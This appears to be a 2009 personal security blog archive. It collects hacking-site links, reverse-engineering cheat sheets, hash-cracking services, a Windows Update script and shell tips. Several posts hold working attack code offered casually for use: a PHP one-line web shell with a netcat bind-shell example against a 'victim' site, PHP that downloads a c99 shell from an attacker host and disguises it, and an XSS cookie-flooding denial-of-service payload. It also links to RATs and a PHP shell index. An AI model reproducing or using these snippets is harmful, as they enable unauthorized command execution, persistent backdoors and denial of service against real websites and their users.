Friday, May 29, 2009

What is a Rootkit? You sure?

A very well written article on some of the history and details of what a “rootkit” is:

http://www.omninerd.com/articles/r00tkit_Analysis_What_Is_A_Rootkit/print_friendly

Technorati Tags: ,,,

“Underground Hacking” Links

Here are just some sites that I wanted to get off my open tabs and check out later – standard warning applies, do not inherently trust what you find on these pages:

http://hackxcrack.es/

http://www.darkc0de.com/index.shtml

http://www.playhack.net/

http://trythis0ne.com/?page=toolz

http://avhackers.com/index.php

https://www.ihteam.net/#

http://www.w4ck3d.org/forums/

http://www.megapanzer.com (Yes you have seen this one before, but in reference to their RAT)

http://hackforums.net

================================

Un.Aware eZine ( http://www.awarenetwork.org/etc/)

Uninformed eZine ( http://uninformed.org/? )

Phrack eZine ( http://phrack.org/ )

Phrack issue #64 by TCOLH - “A brief history of the Underground scene: ( http://phrack.org/issues.html?issue=64&id=4&mode=txt )

Tuesday, May 26, 2009

Force Windows Update Script

Stolen from: http://msmvps.com/blogs/athif/pages/66375.aspx

Copy and Paste the code below into a text file and name it AUForceUpdate.cmd


=======================================================================
@echo off
Echo This batch file will Force the Update Detection from the AU client: 
Echo 1. Stops the Automatic Updates Service (wuauserv)
Echo 2. Deletes the LastWaitTimeout registry key (if it exists) 
Echo 3. Deletes the DetectionStartTime registry key (if it exists) 
Echo 4. Deletes the NextDetectionTime registry key (if it exists)
Echo 5. Restart the Automatic Updates Service (wuauserv) 
Echo 6. Force the detection 
Pause
@echo on
net stop wuauserv
REG DELETE "HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update" /v LastWaitTimeout /f
REG DELETE "HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update" /v DetectionStartTime /f
Reg Delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update" /v NextDetectionTime /f
net start wuauserv
wuauclt /detectnow
@echo off
Echo This AU client will now check for the Updates on the Local WSUS Server.
Pause
==================================================================

tail -f, I must leave you for another

Stolen from: http://www.shell-fu.org/lister.php?id=820


tail -f


This tails the log file and the '-f' tells tail to follow the file, so anything new added to the file will also be printed to the screen.

Another option is:

less +F /var/log/messages

The +F option turns on less 'follow mode'. It is similar to tail -f but you will have the benefits of less, like scrolling up and down. To stop tailing, use Ctrl-C and to resume it, press Shift-F.

Durzosploit - Javascript Exploit Generator

Takes script('XSS Working'); to the next level:
http://engineeringforfun.com/wiki/index.php/Durzosploit_Introduction

Thursday, May 21, 2009

A Cheat, A Method and a Book

So I wanted to get these down before they scrolled by in twitter:

Nick Harbour's Reverse Engineering Cheat Sheet:

http://www.rnicrosoft.net/docs/X86_Win32_Reverse_Engineering_Cheat_Sheet.pdf


Lenny Zeltser's Reverse Egineering Cheat Sheet:

http://www.zeltser.com/reverse-malware/reverse-malware-cheat-sheet.html


And the Unix Toolbox. DO NOT underestimate the power of this booklet:

http://cb.vu/unixtoolbox.xhtml


Tuesday, May 19, 2009

Defcon CTF and Qualifiers: Past Challenges and Answers

Even if you have never, nor are signed up to compete this year, there is a ton of learning to be had just from what they have done in the past. Take the time to look at the answers and learn from them.
http://nopsr.us/

100 Free Online Courses (MIT and such)

Tarantula - A fuzzing spider

The only homepage I could find: http://github.com/relevance/tarantula

Their quote:
a big hairy fuzzy spider that crawls your site, wreaking havoc


Haven't tried it yet, plan to.

Handwriting Analysis book on Scribd

If you haven't checked out Scribd before, there are a bunch of great books for free there. One of which is:

Handwriting Analysis & Success Secrets by Bart A Baggett

http://www.scribd.com/doc/2902062/Handwriting-Analysis-Success-Secrets-Bart-A-Baggett

Danzer - ActiveX Fuzzer

http://www.cert.org/vuls/discovery/dranzer.html

Here is what they say about it:

Attackers frequently take advantage of vulnerabilities in ActiveX controls to compromise systems using Microsoft Internet Explorer. A programming or design flaw in an ActiveX control can allow an attacker to execute arbitrary code by convincing a user to view a specially crafted web page. Since 2000, we have seen a significant increase in vulnerabilities in ActiveX controls.

We have developed Dranzer, a tool that enables users to examine effective techniques for fuzz testing ActiveX controls. By testing a large number of ActiveX controls, we can provide some insight into the current state of ActiveX security. When we discover new vulnerabilities, we practice responsible disclosure principles and perform the necessary remediation steps.

OfficeCat: Look for Exploits in MS Office Documents

Recently commented on by BreakingPoint (here) as the tool to use when looking for exploits in Office Documents.

Created by Lurene Grenier of the Sourcefire VRT:
http://www.snort.org/vrt/tools/officecat.html

Friday, May 15, 2009

PHP 1-line execute

<?php system($_GET[cmd]);?>

echo that to a file on a system, or use the previous example to call it, and you can run http://victim.com/whatever.php?cmd=nc -lvp 4040 -e /bin/bash and you'll have a shell waiting for you.

Load txt file as PHP

A pretty sick use of php ;-)

       $shell = "http://attacker.com/c99madshell.txt"; //use something less obvious like readme.txt
       $code = file_get_contents($shell);
       $fp=fopen("Sh3ll.php","w+");
       fwrite($fp, $code);
       fclose($fp);
?>


Shell Code Development

Place has some pretty sick shellcode: http://www.shell-storm.org/

Huge List of Online Crackers

Don't know if all of these are online still or not:
SOURCE:(http://blackhat.ge/?page_id=29)

http://www.milw0rm.com/cracker/
http://www.plain-text.info/add/
http://www.securitystats.com/tools/hashcrack.php
http://www.passcrack.spb.ru/
http://gdataonline.com/seekhash.php
http://www.md5-brute.com/
http://www.md5encryption.com/
http://www.insidepro.com/hashes.php?lang=rus
http://www.cirt.net/cgi-bin/passwd.pl
http://passcracking.ru
http://www.hashchecker.com/?_sls=add_hash
http://www.tydal.nu/category/
http://md5.dustinfineout.com/
http://www.md5-db.com/
http://www.md5hashes.com/
http://sha1search.com/
http://md5.xpzone.de/
http://www.csthis.com/md5/
http://md5.benramsey.com/
http://www.md5this.com/crack-it-/index.php
http://hackerscity.free.fr/
http://ice.breaker.free.fr/
http://md5search.deerme.org/
http://www.md5decrypter.com/
http://securitydb.org/cracker/
http://plain-text.info/index/
http://www.tmto.org/?category=main&page=home
http://md5.geeks.li/
http://hashreverse.com/
http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
http://md5crack.it-helpnet.de/index.php?op=add
https://astalavista.net/index.php?
http://md5search.uk.to/

md5:
http://74.52.200.226/~b4ck/passhash/index.php
http://www.tmto.org/
http://md5.rednoize.com
http://nz.md5.crysm.net
http://us.md5.crysm.net
http://www.xmd5.org
http://gdataonline.com
http://www.hashchecker.com
http://passcracking.ru
http://www.milw0rm.com/md5
http://plain-text.info
http://www.securitystats.com/tools/hashcrack.php
http://www.schwett.com/md5/ - Does Norwegian words too
http://passcrack.spb.ru/
http://shm.pl/md5/
http://www.und0it.com/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.md5decrypter.com/
http://www.md5encryption.com/
http://www.md5database.net/
http://md5.xpzone.de/
http://md5.geeks.li/
http://www.hashreverse.com/
http://www.cmd5.com/english.aspx
http://www.md5.altervista.org/
http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
http://alimamed.pp.ru/md5/ (for those who can’t read russian: put your md5 in the second box)
http://md5crack.it-helpnet.de/index.php?op=add
http://cijfer.hua.fi/
http://shm.hard-core.pl/md5/
http://www.mmkey.com/md5/HOME.ASP
http://www.thepanicroom.org/index.php?view=cracker
http://rainbowtables.net/services/results.php
http://rainbowcrack.com/
http://www.securitydb.org/cracker/
http://passwordsecuritycenter.com/in…roducts_ id=7
http://0ptix.co.nr/md5
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com
http://www.pldsecurity.de/forum/md5.php
http://www.xeons.net/genesis/
http://hackerscity.free.fr/
http://bisix.cogia.net/
http://md5.allfact.info/
http://bokehman.com/cracker/
http://www.tydal.nu/article/md5-crack/
http://ivdb.org/search/md5/
http://md5.netsons.org/
http://md5.c.la/
http://www.jock-security.com/md5_database/?page=crack
http://c4p-sl0ck.dyndns.org/cracker.php
http://www.blackfiresecurity.com/tools/md5lib.php
http://www.md5-db.com/index.php

md4:
http://www.securitystats.com/tools/hashcrack.php
http://rainbowtables.net/services/results.php
http://rainbowcrack.com/

sha1:
http://passcrack.spb.ru/
http://www.hashreverse.com/
http://rainbowcrack.com/
http://www.md5encryption.com/
http://www.shalookup.com/
http://md5.rednoize.com/
http://c4p-sl0ck.dyndns.org/cracker.php
http://www.tmto.org/


Misc:
http://linardy.com/md5.php
http://www.gdataonline.com/seekhash.php
https://www.w4ck1ng.com/cracker/
http://search.cpan.org/~blwood/Digest-MD5-Reverse-1.3/
http://www.hashchecker.com/index.php?_sls=search_hash
http://www.rainbowcrack-online.com/
http://schwett.com/md5/
http://www.md5.org.cn/index_en.htm
http://www.xmd5.org/index_en.htm
http://nz.md5.crysm.net/
http://us.md5.crysm.net/
http://gdataonline.com/seekhash.php
http://passcracking.ru/
http://shm.pl/md5/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.md5decrypter.com/
http://www.md5encryption.com/
http://www.md5database.net/
http://md5.xpzone.de/
http://www.hashreverse.com/
http://alimamed.pp.ru/md5/
http://md5crack.it-helpnet.de/index.php?op=add
http://shm.hard-core.pl/md5/
http://rainbowcrack.com/
http://passwordsecuritycenter.com/index.ph…p;products_id=7
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com/
http://hackerscity.free.fr/
http://md5.allfact.info/
http://bokehman.com/cracker/
http://www.tydal.nu/article/md5-crack/
http://passcracking.com/
http://ivdb.org/search/md5/
http://md5.netsons.org/
http://md5.c.la/
http://www.md5-db.com/index.php
http://md5.idiobase.de/
http://md5search.deerme.org/
http://sha1search.com/

User Profile Deletion Utility

Index of PHP Shells

REVIEW THE CODE BEFORE USING ANY WEB SHELL!!

http://blacknite.eu/php_shells/


Thursday, May 14, 2009

Finding SUID/SGID root programs

Source: http://www.faqs.org/docs/securing/chap5sec62.html

EDIT: It doesn't look like it, but it's all one line:
find / -type f \( -perm -04000 -o -perm -02000 \) \-exec ls -lg {} \;


Wednesday, May 13, 2009

WIGS - Website Information Gathering Scanner

A TON of information, in one click without touching the site yourself.. ;-)

http://sucuri.net/index.php?page=scan

Also, my other favorite is: http://www.serversniff.net/



Tuesday, May 12, 2009

List of x86 Instructions

Don't Censor Me!

LeetUpload.com

An awesome repository of interesting do-dads and toys for hackers / security 'pros'

Proceed with caution. There are pointy objects ahead:
http://www.leetupload.com/

"Official" Metasploit Documentation

Hex Editor - Frhed

I've been searching for a free hex editor that had the features I need and the search is finally over.

http://frhed.sourceforge.net/

Thanks @marcusjcarey


Sunday, May 10, 2009

XSS based Client-side DoS

Makes the client's cookie for the site per subdomain 200kb.
http://pastebin.com/f3dfe04f7

/*<script>/*code to create a 200KB of cookies per subdomain*/with(document)domain.replace(/[^.]*\.?/g,function(a){try{domain=domain.replace(a,"")}catch(e){a=""}finally{for(i=0;i<50;i++)cookie=i+"="+Array(4095)+";expires=9 Jan 2038 23:59 GMT;path=/;domain=."+a+domain}})//</script>

I pasted the code in case it gets lost on Pastebin

Fravia's Swansong

Saturday, May 9, 2009

This is why you're fat

Not security related, but hilarious. Come on, who hasn't had a Choco Taco.
http://thisiswhyyourefat.com

Sunday, May 3, 2009

Stock Photo Sites

Links to 16 of them. Why is this good for you? It will help with those presentations you have to give:
http://www.softalize.com/2009/04/14/16-ultimate-collection-of-free-stock-photo-sites/

ErrMess

Another really fun RAT to play with: http://www.errmess.com/

Megapanzer

RAT, and some interesting history dumping ;-)

http://www.megapanzer.com/source-code/